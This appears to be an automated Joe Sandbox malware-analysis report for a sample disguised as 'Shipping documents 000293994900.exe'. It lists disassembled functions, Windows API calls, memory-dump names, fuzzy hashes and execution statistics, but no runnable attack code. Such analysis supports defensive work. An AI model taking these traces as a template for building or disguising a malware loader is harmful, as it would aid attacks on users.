Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

Function 10001617 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
GlobalFree.KERNEL32(00000000), ref: 1000165A

Memory Dump Source

Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401CEB
GetClientRect.USER32(00000000,?), ref: 00401CF8
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
DeleteObject.GDI32(00000000), ref: 00401D36

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
Opcode Fuzzy Hash: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D44
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
ReleaseDC.USER32(?,00000000), ref: 00401D71
CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
Opcode Fuzzy Hash: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E

Function 00404976 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
wsprintfW.USER32 ref: 00404A10
SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23

Strings

%u.%u%s%s, xrefs: 004049F1

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19

Function 00405933 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00405939
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00405943
lstrcatW.KERNEL32(?,00409014), ref: 00405955

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405933

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE

Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68

Function 00405106 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405135
CallWindowProcW.USER32(?,?,?,?), ref: 00405186

Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Strings

, xrefs: 00405116

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A

Function 0040381D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,004037F4,75923420,0040361F,?), ref: 00403837
GlobalFree.KERNEL32(?), ref: 0040383E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED

Function 0040597F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000293994900.exe,C:\Users\user\Desktop\Shipping documents 000293994900.exe,80000000,00000003), ref: 00405985
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000293994900.exe,C:\Users\user\Desktop\Shipping documents 000293994900.exe,80000000,00000003), ref: 00405995

Strings

C:\Users\user\Desktop, xrefs: 0040597F

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy
String ID:
API String ID: 852173138-0
Opcode ID: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
Opcode Fuzzy Hash: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765

Function 00405AB9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

Analysis Process: Shipping documents 000293994900.exePID: 6496, Parent PID: 5436COMMON

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	28
Total number of Limit Nodes:	3

Executed Functions

Function 388D3158 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 388D3887
$]q, xrefs: 388D387B
$]q, xrefs: 388D382E
$]q, xrefs: 388D383A
$]q, xrefs: 388D3863
$]q, xrefs: 388D3857

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: b5fb247958ab17a0861760f728b247bdcd541fe1ced2f0e7f08f2e59f03f39f7
Instruction ID: 9842f2bd7c6700c7730c5ea0228c46d54720d280107cafb4d2270dbf2038fb42
Opcode Fuzzy Hash: b5fb247958ab17a0861760f728b247bdcd541fe1ced2f0e7f08f2e59f03f39f7
Instruction Fuzzy Hash: 29323D35E1071A8FDB15DF79C89459DB7B2BFC9300F60C66AD459A7224EF30A986CB80

Function 388D7E40 Relevance: 3.0, Strings: 2, Instructions: 479
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 388D83DB
$]q, xrefs: 388D83E7

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: ae4d22487d6d1e220731dcb5cb097e34e79757d9194bdf6bfdeca3cf78894b79
Instruction ID: b4603f744f02f002bf11581074c8e73230f58e36196fdc25b090cfac82d5d36f
Opcode Fuzzy Hash: ae4d22487d6d1e220731dcb5cb097e34e79757d9194bdf6bfdeca3cf78894b79
Instruction Fuzzy Hash: 5E02B135B002068FDB18DF64D890A5EB7E6FF84344F508929D819EB795DB35EC4ACB81

Function 0016E360 Relevance: 2.8, Strings: 2, Instructions: 339
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 0016E45E
Xaq, xrefs: 0016E477

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: Xaq$$]q
API String ID: 0-1280934391
Opcode ID: 4760bd0d3f7c0908e9fa7fec828299350933de3ac11b175960906ce1bb35f1da
Instruction ID: d83d8bc09cd06afe6ad99d120642063a1cd59073dd7eeb8dd4445763d6634d51
Opcode Fuzzy Hash: 4760bd0d3f7c0908e9fa7fec828299350933de3ac11b175960906ce1bb35f1da
Instruction Fuzzy Hash: 5BB1D334B042589BDB0CAB7C985427E7BA7BFC8710B15866ED446E7384DF38DC029B92

Function 0016AAAA Relevance: 2.8, Instructions: 2768COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

